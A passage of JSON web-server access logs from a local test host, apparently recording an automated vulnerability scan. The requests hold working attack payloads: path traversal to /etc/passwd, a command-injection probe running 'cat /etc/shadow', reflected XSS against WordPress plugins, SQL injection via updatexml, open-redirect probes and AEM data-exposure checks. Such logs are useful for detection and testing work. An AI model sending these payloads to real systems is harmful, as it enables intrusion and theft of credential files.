"http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gtranslate/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"success=%2Fshare%2Fpage%2F&failure=:\x5C\x5Cexample.com&username=baduser&password=badpass\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /share/page/dologin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /document.php?modulepart=project&file=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /http://127.0.0.1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"{\x22metadata\x22:{\x22order_id\x22:\x221 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)\x22},\x22status\x22:2}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /names.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dumpmdm.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:24 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 